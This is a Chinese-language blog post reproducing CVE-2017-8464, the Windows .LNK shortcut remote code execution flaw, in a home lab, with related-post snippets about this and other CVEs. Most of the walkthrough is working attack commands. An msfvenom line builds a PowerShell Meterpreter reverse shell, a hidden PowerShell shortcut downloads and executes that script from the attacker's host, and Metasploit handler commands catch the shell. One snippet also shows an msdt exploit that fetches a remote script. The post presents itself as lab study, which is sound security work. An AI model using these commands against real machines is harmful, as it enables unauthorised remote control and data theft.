CVE-2017-8464远程命令执行漏洞复现

最新推荐文章于 2024-04-30 02:39:01 发布
最新推荐文章于 2024-04-30 02:39:01 发布
阅读量724 收藏 1
点赞数 2
分类专栏: web安全 文章标签: web安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_46369125/article/details/122210975
版权
CVE-2017-8464远程命令执行漏洞复现

攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件 的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同 的用户权限。

注释:.LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。

漏洞复现:

利用原理:创建恶意快捷方式,包含恶意执行脚本,点击恶意快捷方式,导致本机中病毒。

环境搭建:

攻击机:Kali-Linux-2021.1-vm-amd64 IP:192.168.120.133

靶机:Windows 7 IP:192.168.120.128

复现过程:

kali下生成一个反弹的ps1的shell:

msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.120.133 lport=5555 -f psh-reflection > /opt/search.ps1
结果如图1.1所示。
image-20211227202537542
切换到opt目录,然后查看到已生成了search.ps1 的powershell 后门
image-20211227202555041
将生成的search.ps1拷贝到/var/www/html目录下
image-20211227202610932
启动apache服务
image-20211227202620553
访问web下的search.ps1,可以直接访问:
image-20211227202828166
在靶机上创建一个powershell远程快捷:

powershell -windowstyle hidden -exec bypass -c “IEX (New-Object Net.WebClient).DownloadString(‘http://192.168.120.133/search.ps1’);test.ps1”
image-20211227203313555
名称为:powershell.exe
image-20211227203330549
kali下创建监听反弹,并且可以看到成功反弹出靶机的shell:

use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
show options

image-20211229104458697

set LHOST 192.168.120.133
set LPORT 5555

image-20211229104359002

exploit 开始监听
在靶机上运行新建的powershell快捷方式,即可反弹shell,结果如下图所示。

image-20211229104419312

查看靶机ip:ipconfig

image-20211229105458342

输入shell进入win7shell,使用chcp 65001改变编码格式

image-20211229104925403

使用pwd,getlwd,getuid进行信息收集

image-20211229104738381

个人复现,欢迎交流学习,有问题希望及时指正。

苏同学的安全屋
关注
  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
专栏目录
利用CVE-2017-8464漏洞制作病毒U盘攻击
RockHan
01-09 2658
利用CVE-2017-8464漏洞制作病毒U盘 漏洞简介 在“震网行动”中攻击者利用LNK快捷方式漏洞成功入侵了工控系统,并进一步利用漏洞做摆渡攻击,入侵核心工控系统,LNK漏洞危害级别为高危,用户只要是浏览或查看了存 在病毒的LNK文件,不需要用户点击,就会执行入侵者构造好的恶意代码。 病毒U盘制作 使用kali中msfconsole攻击模块生成病毒U盘文件。 1、启动msfconso...
CVE-2017-8464复现(震网三代)
小赵同学的博客
01-17 389
CVE-2017-8464复现(震网三代) 影响版本 windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008 1. 漏洞利用与复现 环境: 攻击机kali:192.168.228.128 靶机window10 192.168.228.129 Kali终端输入
震网三代(CVE-2017-8464
m0_57379855的博客
03-31 2340
震网三代(CVE-2017-8464CVE-2017-8464环境准备利用原理漏洞利用后渗透 CVE-2017-8464 说明: 2017年6月13日,微软官方发布编号为CVE-2017-8464漏洞公告,官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危 传播的载体一般是LNK ,LNK是windows系统内应用程序快捷方式文件的文件类型后缀名。 危害: 被攻击机插入存在攻击lnk的U盘后会反弹shell,
log4j2远程代码执行漏洞原理与漏洞复现(基于vulhub,保姆级的详细教程)_log4j漏洞复现(1)
最新发布
ling_y_u_n的博客
04-30 419
千千万万要记得:多刷题!!多刷题!!之前算法是我的硬伤,后面硬啃了好长一段时间才补回来,算法才是程序员的灵魂!!!!篇幅有限,以下只能截图分享部分的资源!!(1)多线程(这里以多线程为代表,其实整理了一本JAVA核心架构笔记集)(2)刷的算法题(还有左神的算法笔记)(3)面经+真题解析+对应的相关笔记(很全面)(4)视频学习(部分)ps:当你觉得学不进或者累了的时候,视频是个不错的选择在这里,最后只一句话:祝大家offer拿到手软!!魂!!!!篇幅有限,以下只能截图分享部分的资源!!
CVE-2017-8464震网3.0漏洞分析与复现
weixin_45484297的博客
03-29 2164
概述:微软在2017年6月份的补丁中修补了一个快捷方式(CVE-2107-8464)的漏洞,公告称此漏洞被国家背景的网络攻击所使用来实施攻击,该漏洞也被称为震网三代,随后Metasploit上发布了该漏洞的PoC。官方介绍Windows系统在解析快捷方式时存在远程执行任意代码的高危漏洞,黑客可以通过U盘、网络共享等途径触发漏洞,完全控制用户系统,安全风险高危。本次实验主要分为漏洞复现和poc原理分析两部分,通过实验理清该漏洞可能的的攻击途径以及如何防护。 1.漏洞介绍 该漏洞的原理同2010年美国和以色列入
CVE-2017-8464远程执行命令漏洞
qq_54735393的博客
03-07 344
攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。当用户在Windows资源管理器或解析.LNK文件的任何其他应用程序中打开此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。
CVE-2017-8464漏洞复现
nicedreem的博客
02-14 128
CVE-2017-8464复现
CVE-2020-13925 Apache Kylin 远程命令执行漏洞.md
04-12
CVE-2020-13925 Apache Kylin 远程命令执行漏洞
CVE-2017-12615-master.zip
09-04
**CVE-2017-12615:Apache Struts2远程代码执行漏洞详解** CVE-2017-12615是一个针对Apache Struts2框架的严重安全漏洞,它允许攻击者通过恶意构造的HTTP请求在目标服务器上执行任意代码,从而可能导致数据泄露、...
CVE-2017-7269-Echo-PoC:CVE-2017-7269回显PoC,用于远程入侵检测。
03-02
CVE-2017-7269远程代码执行回显验证 我们团队对此次发布CVE-2017-7269漏洞的分析报告: ://ht-sec.org/cve-2017-7269-vulnerabilities/ DefaultPoC只能弹calc.exe ,现在修改成可以响应请求,命令格式为: CVE-2017...
CVE-2020-24581 D-Link DSL-2888A 远程命令执行漏洞分析1
08-03
**文章标题:**深入解析CVE-2020-24581:D-Link DSL-2888A远程命令执行漏洞 **文章正文:** D-Link DSL-2888A是一款由D-Link公司制造的统一服务路由器,它在AU_2.31_V1.1.47ae55之前的版本中存在一个严重的安全...
CVE-2019-0232 Tomcat RCE 远程命令执行漏洞 复现环境
04-18
本附件是对CVE-2019-0232 Tomcat RCE 远程命令执行漏洞复现环境。 将文件下载到本地,直接运行tomcat 启动服务器,地址栏输入 http://localhost:8080/cgi-bin/hello.bat?c:/windows/system32/net user 即可看到...
CVE-2017-8464 分析
weixin_30814319的博客
12-28 848
目录 CVE-2017-8464(stuxnet 3.0) 分析 0xFF 前言 0x00 分析工具 0x01 漏洞复现 1)、生成一个DLL用于测试 2)、构造一个恶意的lnk二进制文件 3)、RUA! ...
Exploit/CVE-2010-0738
男神的专栏
06-09 1116
JBoss是一个基于J2EE的开放源代码应用服务器,代码遵循LGPL许可,可以在任何商业应用中免费使用;JBoss也是一个管理EJB的容器和服务器,支持EJB 1.1、EJB 2.0和EJB3规范。但JBoss核心服务不包括支持servlet/JSP的WEB容器,一般与Tomcat或Jetty绑定使用。在J2EE应用服务器领域,JBoss是发展最为迅速的应用服务器。由于JBoss遵循商业友好的LGPL授权分发,并且由开源社区开发,这使得JBoss广为流行。
CVE-2017-8464复现
qq_41772873的博客
03-02 1041
前言 CVE-2017-8464又称远程快捷方式漏洞 攻击者可以向用户呈现包含恶意的.LNK文件和相关联的恶意二进制文件的可移动驱动器或远程共享。 当用户此驱动器(或远程共享)时,恶意二进制程序将在目标系统上执行攻击者选择的代码,成功利用此漏洞的攻击者可以获得与本地用户相同的用户权限。 注释:.LNK是用于指向其他文件的一种文件,这些文件通常称为快捷方式文件,通常它以快捷方式放在硬盘上,以方便使用...
震网三代cve_2017_8464漏洞复现
04-05 1341
影响版本:   windows 10 windwos RT 8.1 windows 8.1 windows 7 windows server 2016 windows server 2012 R2 windows server 2012 windows server 2008 R2 windows server 2008   以下文章中<   >里的内容为需要输...
漏洞预警】CVE-2017-8464 震网三代漏洞复现
weixin_30613343的博客
08-06 242
早在6月13日,微软发布补丁修复编号为CVE-2017-8464漏洞,本地用户或远程攻击者可以利用该漏洞生成特制的快捷方式,并通过可移动设备或者远程共享的方式导致远程代码执行,追溯到以前,NSA就承认利用过相似漏洞且以“Olympic Game”为代号研发震网病毒,来阻止伊朗发展核武。 受影响版本 Windows 7 Windows 8.1 Windows RT 8.1...
CVE-2017-8464(震网三代)复现
andiao1218的博客
11-05 474
开启msf root@sch01ar:~# msfconsole 设置模块 msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce 设置payload msf exploit(cve_2017_8464_lnk_rce) > set payload windows/x64/...
MSF之CVE-2017-8464远程命令执行漏洞复现
极光时流
12-02 3276
MSF之CVE-2017-8464远程命令执行漏洞复现准备扫描漏洞 准备 实验准备环境: 被攻击机:虚拟机win2008x64位系统,其IP为:192.168.1.107 攻击机:虚拟机kali系统,其IP为:192.168.1.111 攻击工具:kali自带的msfconsole工具 扫描漏洞 在kali终端中输入msfconsole cd 下载/ msfvenom -p windows...
cve-2022-30190 msdt远程代码执行漏洞复现
09-10
CVE-2022-30190是一个针对Microsoft的漏洞,被称为msdt远程代码执行漏洞。该漏洞允许攻击者通过利用命令行工具"msdt.exe"的特定参数进行远程代码执行。以下是关于该漏洞复现过程。 首先,我们需要使用攻击者控制的远程服务器,以便在受影响的目标系统上执行恶意代码。我们创建以下PHP脚本,将其上传到我们的远程服务器上: ``` <?php system('calc.exe'); ?> ``` 这段代码将在目标系统上执行计算器应用程序,然后我们将通过"msdt.exe"命令行工具的特定参数利用该漏洞。 在受影响的目标系统上,我们将打开命令提示符,并执行以下命令: ``` msdt.exe "http://your-remote-server.com/evil-script.php" /id "netwoCpl" /showUI ``` 上述命令将启动"msdt.exe"并使用指定的URL作为参数,同时还指定了"networkCpl"作为"msdt.exe"的标识符。最后,使用"/showUI"参数显示用户界面。 当目标系统执行命令时,"msdt.exe"会检索远程服务器上的脚本文件,并尝试执行该脚本。由于脚本文件具有恶意代码,它将在目标系统上执行计算器应用程序。 这就是CVE-2022-30190 msdt远程代码执行漏洞的一个简单复现过程。然而,值得注意的是,这只是为了说明该漏洞的原理,实际的攻击可能需要更复杂的技术和步骤。为了保护系统安全,我们建议及时更新受影响的软件,以修补此漏洞。还应该维护良好的网络安全措施,以减少被利用的风险。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

苏同学的安全屋

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值